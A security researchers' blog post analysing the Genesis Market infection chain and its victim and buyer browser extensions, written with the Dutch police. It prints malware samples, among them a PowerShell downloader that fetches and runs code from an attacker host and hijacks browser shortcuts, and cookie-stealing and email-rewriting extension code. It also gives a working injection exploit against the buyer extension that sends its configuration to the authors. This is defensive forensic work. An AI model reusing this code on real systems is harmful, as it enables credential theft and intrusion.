Normal view

There are new articles available, click to refresh the page.
Before yesterdaySector 7

Technical analysis of the Genesis Market

5 April 2023 at 00:00

For the last couple of weeks we’ve assisted the Dutch police in investigating the Genesis Market. In case you are unfamiliar with this market, it was used to sell stolen login credentials, browser cookies and online fingerprints (in order to prevent ‘risky sign-in’ detections), by some referred to as IMPaas, or Impersonation-as-a-Service. The market seemed to have started in 2018 and its activities have resulted in approximately two million victims. If you want to know more about this operation, you can read our other blog post. You can also check if your data has been compromised by the market operators via the website of the Dutch police.

In order to operate this market, victims were infected with malware that would steal all data from their browser. The malware was persistent, so that any new information added to the browser later could be stolen as well. Buyers would receive access to a custom Chromium build or browser extension which could load the stolen information of a victim.

We helped the police by analysing the malware that got installed by its victims and by analysing the browser that would be accessible for buyers. The focus was to determine the infection chain of the victim. Additionally, we looked at the browser available to buyers, to see if this would give new insights about the methods used by the market or the buyers. The victim in this case got infected in the second half of February.

Due to the short timespan in which this research had to be conducted, it can be that some details are missing or not 100% accurate. We’ve been careful to mention any uncertainties in this article. This article should however give some more insight on how this market operated and can hopefully give future researchers a head start if this market ever re-launches. In addition, it highlights a trend of attackers switching from stealing credentials to stealing session cookies, to cope with the increased adoption of multi-factor and risk-based authentication.

This analysis starts with a write-up of the infection chain and an analysis of the malware that gets dropped. In the second half we dig deeper into the buyers browser extension and how it can be fingerprinted. In case you are interested, Trellix also has a writeup of the exploit chain of one of the other victims.

The infection

Stage one: the loader

The infection we investigated started (ironically) because the victim wanted to activate his or her anti-virus product. Rather than paying for a subscription, the victim downloaded an illegal activation crack. This ended up uninstalling the original AV product and installing malware instead…

The activation crack came as an executable, setup.exe, packed in a ZIP file. Looking at the creation date, it seems like the file was created the day before. Possibly to bypass any new AV detection rules. The file is 444 MB in size, but the last 439 MB are all set to 0.

Upon further investigation, setup.exe seemed to be Inno Setup generated installer, with the packaged data being the malicious payload. Luckily, we could quickly test this hypothesis and make use of a wide array of tools to investigate the installer package further:

Using innoextract, a listing of the packaged files can be retrieved:

$ innoextract -e ./setup.exe -d extracted
Extracting "Ino JCcq7ie Supsup" - setup data version 6.1.0 (unicode)
 - "tmp/jcoigasjioqeg.dll" [temp]
 - "tmp/yvibiajwi.dll" [temp]
 - "tmp/isgoisegjoqwg.dll" [temp]

And looking at the file signatures:

$ cd extracted && file tmp/*
isgoisegjoqwg.dll: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1920x1080, components 3

jcoigasjioqeg.dll: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS6 (Windows), datetime=2023:02:09 01:02:17], progressive, precision 8, 3840x2160, components 3

yvibiajwi.dll:     PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

The two images seem unrelated to the actual malware. They are a picture of a pride flag and a picture of LeBron James.

Setup images

yvibiajwi.dll stood out because there were multiple identical copies of that DLL in the directories created by setup.exe on the victim’s machine, but none of the other two files.

Additionally, the second stage executable setup.tmp loads yvibiajwi.dll at some point. More specifically, the following high level sequence of actions takes place:

  1. setup.exe creates a new directory, referred to as the setup temp directory from here on, with the format is-<5 uppercase random alphanumeric>.tmp in the directory retrieved by GetTempPath()
  2. setup.exe writes another executable, setup.tmp to the setup temp directory
  3. setup.exe launches setup.tmp with the command line argument /SL5="$B0638,3246841,963072,<path to setup.exe>"
  4. setup.tmp opens the setup.exe file, reads data from it and writes yvibiajwi.dll to the setup temp directory
  5. setup.tmp launches setup.exe with the command line argument /VERYSILENT
  6. setup.exe creates a new setup temp directory and writes setup.tmp to the new directory then launches it with a similar /SL5 command line argument
  7. setup.tmp reads yvibiajwi.dll from the packaged data in setup.exe and writes it to the most recently created setup temp directory
  8. setup.tmp loads yvibiajwi.dll

The second invocation with /VERYSILENT hides all of the installer’s windows, per Inno Setup’s documentation. Keeping Inno Setup’s intended purpose in mind, the above flow seems unusual. It would likely not be standard functionality unless there is extra code embedded into the generated installer, is there?

Embedded PascalScript

Inno Setup supports adding specialized tasks to a generated installer beyond simply unpacking the contents. An installer script can specify user-specified yet defined tasks in the [Tasks] section, or programs to execute in the [Run] section. Additionally, an installer script can also specify custom code in PascalScript to customize the (un-)installation process. setup.exe also includes an embedded compiled script which defines a function to be called on setup initialization. Using innounp and IFPSTools.NET, the embedded PascalScript can be unpacked and decompiled for analysis:

.version 23

.entry !MAIN

.type primitive(Pointer) Pointer
.type primitive(U32) U32
.type primitive(Variant) Variant
.type primitive(PChar) PChar
.type primitive(Currency) Currency
.type primitive(Extended) Extended
.type primitive(Double) Double
.type primitive(Single) Single
.type primitive(S64) S64
.type primitive(String) String
.type primitive(U32) U32_2
.type primitive(S32) S32
.type primitive(S16) S16
.type primitive(U16) U16
.type primitive(S8) S8
.type(export) funcptr(void()) ANYMETHOD
.type primitive(String) String_2
.type primitive(UnicodeString) UnicodeString
.type primitive(UnicodeString) UnicodeString_2
.type primitive(String) String_3
.type primitive(UnicodeString) UnicodeString_3
.type primitive(WideString) WideString
.type primitive(WideChar) WideChar
.type primitive(WideChar) WideChar_2
.type primitive(Char) Char
.type primitive(U8) U8
.type primitive(U16) U16_2
.type primitive(U32) U32_3
.type(export) primitive(U8) BOOLEAN
.type primitive(U8) U8_2
.type(export) class(TWIZARDFORM) TWIZARDFORM
.type(export) class(TMAINFORM) TMAINFORM

.global(import) TMAINFORM MAINFORM

.function(export) void !MAIN()

.function(import) external dll("shell32.dll","ShellExecuteW") __stdcall returnsval shell32.dll!ShellExecuteW(__in __unknown,__in __unknown,__in __unknown,__in __unknown,__in __unknown,__in __unknown)

.function(import) external dll("files:yvibiajwi.dll","RedrawElipse") __cdecl void files:yvibiajwi.dll!RedrawElipse(__in __unknown)

	pushtype S32 ; StackCount = 1
	pushtype S32 ; StackCount = 2
	pushtype S32 ; StackCount = 3
	pushtype S32 ; StackCount = 4
	pushtype S32 ; StackCount = 5
	pushtype String_3 ; StackCount = 6
	pushtype S32 ; StackCount = 7
	pushtype S32 ; StackCount = 8
	pushtype S32 ; StackCount = 9
	pushvar RetVal ; StackCount = 10
	pop ; StackCount = 9
	assign Var1, S32(3490579)
	assign Var4, S32(6006047)
	add Var4, Var1
	assign Var8, S32(2538214)
	add Var8, Var1
	assign Var4, S32(0)
	pushtype BOOLEAN ; StackCount = 10
	assign Var10, RetVal
	setz Var10
	sfz Var10
	pop ; StackCount = 9
	jf loc_245
	pushtype BOOLEAN ; StackCount = 10
	pushtype S32 ; StackCount = 11
	pushtype S32 ; StackCount = 12
	assign Var12, S32(5)
	pushtype UnicodeString_2 ; StackCount = 13
	assign Var13, UnicodeString_3("")
	pushtype UnicodeString_2 ; StackCount = 14
	assign Var14, UnicodeString_3("/VERYSILENT")
	pushtype UnicodeString_2 ; StackCount = 15
	pushtype UnicodeString_2 ; StackCount = 16
	assign Var16, UnicodeString_3("{srcexe}")
	pushvar Var15 ; StackCount = 17
	pop ; StackCount = 16
	pop ; StackCount = 15
	pushtype UnicodeString_2 ; StackCount = 16
	assign Var16, UnicodeString_3("")
	pushtype S32 ; StackCount = 17
	assign Var17, S32(0)
	pushvar Var11 ; StackCount = 18
	call shell32.dll!ShellExecuteW
	pop ; StackCount = 17
	pop ; StackCount = 16
	pop ; StackCount = 15
	pop ; StackCount = 14
	pop ; StackCount = 13
	pop ; StackCount = 12
	pop ; StackCount = 11
	le Var10, Var11, S32(32)
	pop ; StackCount = 10
	sfz Var10
	pop ; StackCount = 9
	jf loc_203
	assign Var5, S32(3391624)
	assign Var7, S32(840271)
	add Var7, Var1
	add Var7, S32(24673)
	assign Var7, S32(128817)
	assign RetVal, BOOLEAN(1)
	assign Var9, S32(4775799)
	assign Var6, UnicodeString_3("HqKTEgDM0D2xEzOpyamSPdX")
	jump loc_325
	assign Var9, S32(2482010)
	assign Var2, S32(1011875)
	assign Var9, S32(498847)
	assign Var4, S32(1795972)
	pushtype S32 ; StackCount = 10
	assign Var10, S32(490102)
	call files:yvibiajwi.dll!RedrawElipse
	pop ; StackCount = 9
	assign Var6, UnicodeString_3("cbdmPSyrpKqYV1")
	assign Var5, S32(1512452)
	pushtype UnicodeString_3 ; StackCount = 10
	assign Var10, Var6
	add Var10, UnicodeString_3("eIfOyEgNLbgUddEtLD")
	assign Var6, Var10
	pop ; StackCount = 9

.function(import) external internal returnsval WIZARDSILENT()

.function(import) external internal returnsval EXPANDCONSTANT(__in __unknown)

The functionality implemented by the above script seems to match up with the observed behavior. When the installer process executes it in ‘SILENT’ mode, it also invokes a function called RedrawElipse in yvibiajwi.dll, which kicks off the next stage of the infection chain.

Diving into yvibiajwi.dll

The DLL seems to be written in C++. Upon loading this DLL in IDA, we’re finally met with our first taste of control flow obfuscation in the infection chain so far:


The obfuscation techniques applied are limited to runs of bogus Windows/libc API calls that are guarded by an always false if condition or empty loops, so it’s relatively simple to ignore them:


With the control flow cleaned up a bit, we can finally tell that the DLL is another dropper which loads a piece of shellcode and executes it. However, execution of the shellcode is not done on DLL loading in DllMain, instead DllMain only sets up a few pointers and allocates memory for the shellcode and nothing else. In order to execute the embedded shellcode, the exported RedrawElipse function has to be called with the first argument set to 0x77A76 or 490102. Of course, this is exactly how the function is invoked in the embedded PascalScript in setup.exe:

	pushtype S32 ; StackCount = 10
	assign Var10, S32(490102)
	call files:yvibiajwi.dll!RedrawElipse

Once invoked, RedrawElipse eventually calls crypt32.dll!CryptStringToBinaryA to decode the embedded base64 shellcode block. It then decrypts the decoded block using what seems to be a custom 64-bit block cipher with a hardcoded key then executes the decrypted shellcode.

The shellcode then decrypts an embedded loader executable using the eXtended Tiny Encryption Algorithm (XTEA) block cipher and uses process hollowing to inject it into a newly spawned explorer.exe process. Afterwards, the injected loader downloads a file from http://194.135.33[.]96/rozemarin.exe, which gets renamed to svchost.exe and executed. It also executes a PowerShell script which downloads some more resources. Both are described in more detail hereafter.

Taking a closer look at svchost.exe

All of the stages prior to the one that loaded this executable involved dropping a static next stage in some shape or form. However, this executable was downloaded and is therefore one of the first elements of the infection chain that might differ from one campaign to the next. Case in point: after extracting the previous stage’s executable, we found a matching submission (by hash) on VirusTotal. In addition, linked to the VirusTotal submission is a VMRay analysis report showing a different hash for the svchost.exe executable to this one which was acquired from the victim’s filesystem.

Focusing on this svchost.exe version: it sets off another series of nested encrypted shellcode stages. The first stage is decrypted and executed, which sets up and executes the second stage and so on. Each stage is encrypted differently from its successor:

  1. The first stage is encrypted using the Tiny Encryption Algorithm (TEA) block cipher.
  2. The second stage is encrypted using a custom cipher.
  3. The third and final stage is an executable that is embedded in plaintext in the second stage.

Interestingly, the final stage is executed through “self PE injection”. This is achieved by having the second stage shellcode replace the PE of its own process, namely the svchost.exe executable, with the embedded final stage’s PE. Afterwards, relocations are updated to match those of the final stage PE, and the second stage shellcode jumps to the now-mapped final stage executable’s entry point.

While analyzing the final executable, we noticed that there is quite some similarity between it and a DLL found on the victim’s machine which matched the Danabot malware. This makes sense, as we learned that the Genesis Market relied on multiple known botnets in the past. AZORult, GoodKit and Arkei also seem linked to prior infections. The reason we suspected Danabot is because both pieces of code are written in Delphi and are heavily obfuscated using almost identical techniques. We were able to find a much stronger link when analysing the chain starting from svchost.exe dynamically:

Dropped and executed DLL by the malicious svchost.exe

The screenshot above shows that the at some point, svchost.exe writes the malicious Qruhaepdediwhf.dll DLL to the user’s %TMP% directory and loads it using rundll32.exe. Shortly after doing so, svchost.exe’s process exits while the rundll32.exe process that loaded the malicious DLL continues. Furthermore, we found that both the Qruhaepdediwhf.dll file from the victim’s device and the one dropped in the analysis detonation run are almost identical except for what seems to be a randomly generated hex-encoded identifier at offset 0x0050695C (exact identifiers modified):

$ diff <(hexdump -C original_Qruhaepdediwhf.dll) <(hexdump -C dropped_Qruhaepdediwhf.dll)
< 00506950  04 55 41 00 0c 55 41 00  14 55 41 00 41 41 41 41  |.UA..UA..UA.AAAA|
< 00506960  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
< 00506970  41 41 41 41 41 41 41 41  41 41 41 41 7a 7a 00 00  |AAAAAAAAAAAAzz..|
> 00506950  04 55 41 00 0c 55 41 00  14 55 41 00 42 42 42 42  |.UA..UA..UA.BBBB|
> 00506960  42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42  |BBBBBBBBBBBBBBBB|
> 00506970  42 42 42 42 42 42 42 42  42 42 42 42 7a 7a 00 00  |BBBBBBBBBBBBzz..|

At this stage, we stopped analysing the infection chain further since the links between the artefacts on the victim’s device and the suspected initial infection vector have been sufficiently clarified. The remainder of this document focuses on the parts of the malware that are more strongly related to the market’s illicit activities.

Downloading remote resources

As mentioned earlier, the final loader executable that is executed by the decoded shellcode in yvibiajwi.dll not only drops svchost.exe, but also runs the following PowerShell command:

$w = new-object System.Net.Webclient;
$bs = $w.DownloadString("http://tchk-1[.]com/v3.bs64");

[Byte[]] $x=[Convert]::FromBase64String($bs.Replace("!", "A").Replace("@", "W").Replace("$", "x").Replace("%", "y").Replace(" ^", "z"));

for ($i = 0; $i -lt $x.Count; $i++) {
    $x[$i] = ($x[$i] -bxor 255) -bxor 11


This downloads a new PowerShell command from the remote host tchk-1[.]com, which gets executed. Further analysis of this host revealed that it is just a proxy (using HAProxy), forwarding requests to other hosts.

Besides v3.bs64 there seem to be other versions as well, such as 5.ps1. In general it seems to do either contain encoded files inline, or download these files separately. These files constitute an unpacked browser extension, which (in case of our victim) gets saved in $localAppData\Default. Then the script iterates over all start menu items, looking for shortcuts to browsers based on Chromium, such as Google Chrome and Brave. It modifies these shortcuts by appending --load-extension=<extension path> to each shortcut such that the just dropped extension gets loaded.

Below you can find the decoded version of v3.bs64, though encoded data has been removed for readability:

$strangeDesktop = [Environment]::GetFolderPath("CommonDesktopDirectory")
$programFiles = [Environment]::GetFolderPath("ProgramFiles")
$appData = [Environment]::GetFolderPath("ApplicationData")
$userProfile = [Environment]::GetFolderPath("UserProfile")
$localAppData = [Environment]::GetFolderPath("LocalApplicationData")

$encodedData = @{"src/functions/exchangeSettings.js"="..."...}

$destination = "$localAppData\Default"

if (-not (Test-Path $destination)) {
    New-Item $destination -ItemType Directory | Out-Null

foreach ($item in $encodedData.GetEnumerator()) {
    $decodedContent = [System.Convert]::FromBase64String($item.Value)
    $filePath = Join-Path $destination $item.Key
    $directoryPath = Split-Path $filePath -Parent
    if (-not (Test-Path $directoryPath)) {
        New-Item $directoryPath -ItemType Directory | Out-Null
    [System.IO.File]::WriteAllBytes($filePath, $decodedContent)

$startMenuPrograms = @(
    "$appData\Microsoft\Internet Explorer\Quick Launch"

$braveWorkingFolder = "$programFiles\BraveSoftware\Brave-Browser\Application"
$chromeWorkingFolder = "$programFiles\Google\Chrome\Application"
$operaGXWorkingFolder = "$localAppData\Programs\Opera GX"
$extensionPath = "$localAppData\Default"
$shell = New-Object -ComObject WScript.Shell

Get-ChildItem -Path $startMenuPrograms -Filter *.lnk -Recurse -Force |
    Where-Object {
        $link = $shell.CreateShortcut($_.FullName)
        $link.WorkingDirectory -eq $braveWorkingFolder -or
        $link.WorkingDirectory -eq $chromeWorkingFolder -or
        $link.WorkingDirectory -eq $operaGXWorkingFolder
    } |
    ForEach-Object {
        $link = $shell.CreateShortcut($_.FullName)
        $link.Arguments = "$($link.Arguments) --load-extension=`"$extensionPath`""

Stop-Process -Name "chrome" -Force
Stop-Process -Name "opera" -Force
Stop-Process -Name "brave" -Force

The victim’s browser extension: Google Drive

We believe the extension that gets dropped and loaded into Chrome is directly related to the market. It poses itself as Google Drive, as can been seen in its manifest.json:

  "offline_enabled": true,
  "name": "Google Drive",
  "author": "Google inc.",
  "description": "Google Drive: create, share and keep all your stuff in one place.",
  "version": "1.8.7",
  "icons": {
    "128": "ico.png"
  "permissions": [
  "manifest_version": 3,
  "background": {
    "service_worker": "./src/background.js",
    "type": "module"
  "host_permissions": [
  "content_scripts": [
      "matches": [
      "all_frames": true,
      "js": [
      "run_at": "document_start"
  "declarative_net_request": {
    "rule_resources": [
        "id": "disable-csp",
        "enabled": false,
        "path": "rules.json"

It injects several content scripts and it declares some rewrite rules that disable the Content Security Policy. The extension itself consists of multiple JavaScript files, for which no effort was made to obfuscate them. Let’s look a little closer to its features. Below you can see a file listing of the extension, which already paints a picture of what to expect:

$ find . -type f

Somewhat surprisingly, the discovered extension includes the analytics service using the following URL:

https://c8fc9104534a411a83cbe61[email protected][.]io/4504639321407488

In a later version of the extension we analysed, this reference was removed.

Command and Control

The first thing we noticed was how it determines its C2 server. For this it relied on monitoring outgoing transactions from a single Bitcoin address (bc1qtms60m4fxhp5v229kfxwd3xruu48c4a0tqwafu), using the JSON API of This address has made a single transaction, to a legacy Bitcoin address 1C56HRwPBaatfeUPEYZUCH4h53CoDczGyF. This address can be Base58 decoded, resulting in the domain you-rabbit[.]com. This host is then contacted as the C2 server.

Since this transaction took place on February 6th 2023, prior infections must have used either a different technique, or relied on a different Bitcoin address to determine its C2 host. For this we downloaded a copy of the Bitcoin transaction database from January and decoded all legacy addresses to see if we could find any similar addresses, but this did not result in any matches. This could indicate that this was a new technique they just adopted in the last few months.

Oh no! There is something wrong with my Bitcoin wallet

One of the things the extensions monitors for is emails you might receive from various crypto exchanges. If so, it rewrites the email, to make them look less suspicious. For example, changing an email about a withdrawal into an email about a new sign-in:

if (window.location.href.indexOf('') > -1) {
    const binance = () => {
        let items = $(document).find(':contains("Withdrawal Requested")').filter(function () {
            return $(this).children().length === 0;

        for (const item of items) {
            $(item).text(`[Binance] Authorize New Device`)

        items = $(document).find('span:contains("Memo:")')

        for (const item of items) {
            $(item).html(`<span class="Zt">&nbsp;-&nbsp;</span>Authorize New Device You recently attempted to sign in to your Binance account from a new device or location. As a security measure, we require additional confi.`)

        items = $($(document).find('div:contains("Memo:")').filter(function () {
            return $(this).children().length === 0;

        for (const item of items) {
            const code = $($(item).find('div[style*="font-size:20px"]')[1]).find('div').text()


They have support for Gmail, Hotmail/Outlook and Yahoo and seem to monitor emails from Binance, Bybit, Huobi, Okx, Kraken, KuCoin and Bittrex.

Since they don’t actually check for the domain name, but rather if e.g. ‘’ is present somewhere in the URL, we can use this to detect if an user is infected with this extension:

<script type="text/javascript">

if (window.location.href.indexOf("") === -1) {
	window.location.href = window.location.href + "";

setTimeout(function analyze() {
	var checks = [];
	// The + is needed to avoid this element itself being modified!
	checks.push(document.getElementById("binance").innerText !== "Withdrawal " + "Requested");
	checks.push(document.getElementById("huobi").innerText !== "Подтвердите " + "запрос на вывод средств");
	checks.push(document.getElementById("okx").innerText !== "Verification " + "Code Of Withdrawal");
	checks.push(document.getElementById("kraken").innerText !== "Confirm " + "your new withdrawal address");
	checks.push(document.getElementById("kucoin").innerText !== "KuCoin " + "Verification Code");
	checks.push(document.getElementById("bitget").innerText !== "Add " + "withdrawal address");
	checks.push(document.getElementById("bittrex").innerText !== "Please " + "Confirm Your Withdrawal");

	var found = 0;

	for (i in checks) {
		if (checks[i]) found += 1;

	if (found === 0) {
		document.getElementById('result').innerText = "Good news! The malicious browser extension was not detected.";
	} else {
		document.getElementById('result').innerHTML = "Bad news! We also detected this extension on your system. We would advice you to go to the website of the <a href=''>Dutch police</a>, where they can assist you further.";
}, 2000)


<p style="display: none;" id="binance">Withdrawal Requested</p>
<p style="display: none;" id="huobi">Подтвердите запрос на вывод средств</p>
<p style="display: none;" id="okx">Verification Code Of Withdrawal</p>
<p style="display: none;" id="kraken">Confirm your new withdrawal address</p>
<p style="display: none;"id="kucoin">KuCoin Verification Code</p>
<span style="display: none;" id="bitget">Add withdrawal address</span>
<p style="display: none;" id="bittrex">Please Confirm Your Withdrawal</p>

<div id="result">Checks still running...</div>

This script is embedded on this page, and the result is:

Deputizing the victim’s browser - request proxying

Another interesting feature of the malicious browser extension is the ability to proxy HTTP requests through the victim’s browser. This feature can be enabled at any time by the C2 server using the aptly-named proxy command (more on the other supported commands later). In addition, the feature can also be enabled during registration with the C2 server if isEnabledProxy is set to true in the JSON-formatted response of the registration endpoint at https://{c2.domain}/api/machine/init.

When enabled, the proxy feature attempts to set up a WebSocket connection channel to another C2 server which is relayed by the main C2 server in the response to https://{c2.domain}/api/machine/settings on port 4343. Once set up, the proxy submodule will wait for commands from its associated C2 server, which can be one of:

  • HTTP_REQUEST request a URL through the victim’s browsers, adding the victim’s own cookies using the fetch() API
  • AUTH provide the uuid of the malicious extension’s instance
  • GET_COOKIES get a copy of all the cookies

Requests made by the C2 server through the HTTP_REQUEST command occur within the context of the extension, making them invisible to victims. We were able to test this specific subset of the functionality by creating our own set of emulated C2 servers, so we could see the proxy functionality in action asking the extension to make a request to http://localhost:8080/test2:

HTTP_REQUEST message sent by the emulated C2 server to the browser extension

As a result, the extension indeed issued a request to http://localhost:8080/test2:

Requests from the extension to localhost:8080/test2

Despite the existence of this proxy feature, its intended use case remains a mystery to us. From the point of view of features available to market users, the buyers’ extension - which is further elaborated on later in this writeup - makes no reference to this feature. There is the possibility to set a SOCKS5 proxy in the extension settings page, but that does not seem related to the malicious extension’s proxy feature. Additionally, the user manual only mentions the SOCKS5 proxy feature.

It may be the case that proxying through the victim’s machine is possible for bot buyers, perhaps through a SOCKS5 interface exposed by the Danabot-like malware that’s deployed as part of the infection chain. However, we do not have enough information to make any definitive conclusions on whether these features are available to buyers or not.

Other functionality

Besides rewriting emails and proxying requests, the C2 server can send the following commands to the victim:

  • extension enable or disable a certain browser extension
  • info get information about the victim’s machine (e.g. WebGL machine details)
  • push send a push notification
  • cookies get a copy of all cookies
  • screenshot send back a screenshot of the page currently open in the browser
  • url open a URL in the browser
  • current_url send back the URL of the current tab
  • history send back the browser history
  • injects download a new set of rules from the server, which specify extra JavaScript to execute on certain domains
  • settings get a new settings object from the server; for example links it should grab

Analysis of the browser (extension) for buyers

Buyers on the market get access to a Chromium extension (as .crx file) and a browser (based on ungoogled-chromium) with the extension preinstalled. This extension can easily import bought fingerprints and cookies.

General functionality

The extension, once activated, allows buyers to automatically import bought fingerprints and cookies. Furthermore, it allows for the setup of an SOCKS5 based proxy. The plugin can been seen in action in the GIF below.

Browser in action

Analyzing the source code

This extension is heavily obfuscated, making it difficult to determine exactly how it works and what features it offers. We combined the analysis of the source code with dynamic analysis in an isolated VM.

The extension requires a large list of permissions, for example, allowing it full access to all visited pages. The full list of permissions is:

"permissions": ["<all_urls>", "tabs", "storage", "unlimitedStorage", "cookies", "webNavigation", "webRequestBlocking", "webRequest", "browsingData", "privacy", "background", "bookmarks", "downloads", "clipboardRead", "clipboardWrite", "contentSettings", "contextMenus", "history", "idle", "management", "pageCapture", "topSites", "system.cpu", "system.memory", "", "declarativeContent", "activeTab", "power", "desktopCapture", "proxy"],

This list contains a number permissions for which it is not clear what functionality they are intended for, such as desktopCapture, system.cpu and power.

When the extension is installed, users need to activate it using an “activation code”. When a code is entered, the browser sends a POST request to the following URL:


If this request fails, it tries again with the following URL:


This request contains a multipart body with 3 variables: a, v and i. Each field is encrypted and is included as binary data in the multipart body. The encryption of the activation key (the field a) works as follows:

  • The activation key is encoded as a JSON string (enclosed in double quotes).
  • This string is URL-encoded (replacing the double quotes with %22, etc.).
  • This result is then compressed using deflate (the compression algorithm used by zlib, but without a zlib header).
  • Then, a key and IV are generated. This uses the OpenSSL EVP_BytesToKey KDF with a random 8-character salt and the hard-coded password liauyd(o*!&@#ijKj@!#asdg2134.
  • The compressed data is encrypted using AES-CBC with the generated key and IV and with PKCS7 padding.
  • The data submitted in the request is the random salt followed by the cipher text.

The parameters v and i are encrypted in a similar way, but with a different password. The password is generated by taking the activation key, swapping the case of all letters (replacing lowercase characters with uppercase characters and vice versa) and appending the string asdg2134.

The parameter v contains the version number of the plugin (currently 7.2), as a JSON dictionary:

{"v": "7.2"}

The parameter i contains certain fingerprinting data of the browser and extension, such as the user agent, OS details and a list of the removable drives on the user’s machine. We don’t see any way this could be relevant for the extension, so this is likely just included to monitor and track the buyers:

  "p": {
    "p": {
      "a": "aarch64",
      "b": "",
      "c": "",
      "d": 6
    "m": {
      "a": 4113801216
    "s": {
      "a": {
        "c": [],
        "a": [
        "b": []
    "i": {
      "a": {
        "c": [],
        "a": [
        "b": []
  "j": {
    "c": "9a3bd3e8cebf17110f689f58a4a1f43e",
    "w": "6c14da109e294d1e8155be8aa4b1ce8e",
    "s": "Chrome 111",
    "p": {
      "ua": "Mozilla/5.0 (X11; Linux aarch64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.36",
      "browser": {
        "name": "Chrome",
        "version": "",
        "major": "111"
      "engine": {
        "version": "537.36",
        "name": "WebKit"
      "os": {
        "name": "Linux",
        "version": "aarch64"
      "device": {},
      "cpu": {}
    "a": "ad449aba7595468941c6d3b6aad54a4fc76797aa",
    "t": {
      "s": 0,
      "b": 1

The server can reverse this process by first decrypting the activation code, generating the same key and IV using the salt. Then the activation code can be used to decrypt the v and i fields.

Jumping through all these hoops does gives us an ‘activated’ extension:

Activated extension

At regular intervals, the extension will submit its activation code again (specified by renew_interval/renew_enabled). This request contains the same variables as the first activation request with 3 additional fields: b, e and d. The exact meaning of these fields has not yet been determined.

While the code is obfuscated, the settings reveal some of its functionality. We managed to obtain the following configuration object from the extension:

  "pl_version": "7.2",
  "sel_pl_version": "7.2",
  "options_version": "7.2",
  "available_versions": [
  "storage_key": "ext_set",
  "enabled": true,
  "useragent": null,
  "renew_enabled": true,
  "renew_interval": 3600000,
  "renew_onstartup": true,
  "sync": false,
  "proxy_enabled": false,
  "proxy": {
    "ip": false,
    "port": false,
    "type": false
  "settings": {
    "bf": false
  "exceptions_list": [
  "links_domain_sync": [
  "link_path_sync": "/security/",
  "link_path_bots": "/client/bots",
  "link_path_profile": "/client/account/profile",
  "links_domain_shop": [
  "keep_domains": "\\\\",
  "links_bugreport": "",
  "selected_fp": {
    "bot_id": "",
    "hash_unique": ""
  "act_key": false,
  "plugin_id": false,
  "clean_settings": {
    "items": {},
    "since": 0

The URL for the activation is constructed by taking a value from the links_domain_sync and appending the link_path_sync path.

Note that this extension had just been installed and not activated, so the values when in use will be different. It looks likely that the link_path_bots endpoint is used to automatically retrieve the list of cookies and online fingerprints that the buyer has bought. The proxy and selected_fp fields would be filled with settings if the extension was in use.

The configuration can also be obtained from disk from files at the following path:

<Chrome Settings Dir>/Default/Local Extension Settings/<Extension ID>/*.log

This is a LevelDB database, which appears to also keep a number of older versions of the configuration.

The extension contains functionality (and has the permission) to configure a SOCKS5 proxy. In the victim’s extension, a method for proxying HTTPS requests through the victim’s browser was found that uses WebSockets. The functionality to send requests over such a WebSocket connection was not found in the buyer’s extension, although due to the obfuscation this is not fully certain. It is still an open question on whether proxying through the victim’s machine directly was a feature offered by the market, or whether the buyers only used their own SOCKS5 proxies.

Fingerprinting buyers

The extension registers an event handler on all webpages. The content script that gets added to each visited webpage by the extension registers an event handler for a custom event named hammilton. This appears to be a method for communicating with the extension from a webpage, as it will pass the result back to the page. When this event is received by the content script, it sends a message to the background script, which will send a response back as JavaScript code which is evaluated in the content script:

location.href = 'javascript: if(window.bunny && window.bunny.cb && window.bunny.cb[0])window.bunny.cb[0]([{"result":{"result":0}}])'

Therefore, by setting window.bunny.cb[0] to a JavaScript function and sending the event, it is possible to determine if a user has this extension installed by determining if that function is called.

window.bunny = { "cb": [function() {
	console.log("Extension detected.");

window.dispatchEvent(new CustomEvent("hammilton", {"detail": {"l": "0", "o": "b"}}));

The reason why this is present is not entirely clear to us. However, it does provide us with a nice way of fingerprinting the buyers’ extension.

Taking it one step further…

Fingerprinting buyers is already cool of course, but maybe we can take it one step further? For example by exploiting a XSS vulnerability in the extension itself? There is a vulnerability in the method used to communicate back to the webpage. The parameter l in the custom event detail object is used in the response code that is evaluated. This value is used as-is and not escaped before calling eval. By including a single quote character ('), it possible to inject additional JavaScript code that gets executed in the context of the content script.

For example, the following event, sent from the webpage:

window.dispatchEvent(new CustomEvent("hammilton", {"detail": {"l": "a'; console.log(1); //", "o": "b"}}));

Results in the following code being evaluated inside the content script (newlines added for legibility):

location.href = 'javascript: if(window.bunny && window.bunny.cb && window.bunny.cb[a';
//])window.bunny.cb[a'; console.log(1); //]([{"result":{"result":0}}])'

Therefore, the console.log(1) is executed by the content script, instead of the page.

Browser extensions use an (invisible) background page which can use all the permissions granted to that extension. This background page does not directly have access to the contents of the visited webpages, but it can inject new JavaScript to run on those pages, called “content scripts”. Content scripts have access to a specific page and can interact with that page’s DOM, but use a JavaScript environment that is separate from the page’s own JavaScript environment. Content scripts do not have all the permissions of the background page, but they do have permission to send messages to the background page and can access the storage of the extension, making them more powerful than the page’s own JavaScript.

Therefore, one of the things that can be done with by sending messages to the background page is copying the configuration of the plugin. For example:

window.addEventListener("storage", function (event) {
  document.getElementById("log").innerText += "Storage obtained: " + JSON.stringify( + "\n";

var payload = `, (storage) => { window.dispatchEvent(new CustomEvent("storage", {"detail": {"storage": storage }})); });`;

window.parent.dispatchEvent(new CustomEvent("hammilton", {"detail": {"l": "a';" + payload + "; //", "o": "b"}}));

We have actually included a script in this page which will exploit this precise vulnerability (if you have this extension installed). It first turned off the proxy functionality, and then uploaded your extension configuration to us.


We would like to thank all law enforcement agencies that collaborated on this case, to take this market place down. We’re glad we could be of any assistance. All findings have been shared with authorities and all malicious files have been reported to the relevant organisations. Hopefully this post can help any future researchers, if this market place ever comes back online.

If you have any followup questions, feel free to reach out.

For reference, these are the files that we investigated (the buyers side is purposely excluded from this list):

File name SHA1 hash
setup.exe b3e56f7affa17403d3df4ebf4c95b14928798bd6
yvibiajwi.dll 78c43eb6d80888c8153868ebc60ca522185a1fce
svchost.exe f811f77f5b53c13a06b43b10eb6189513f66d2a2
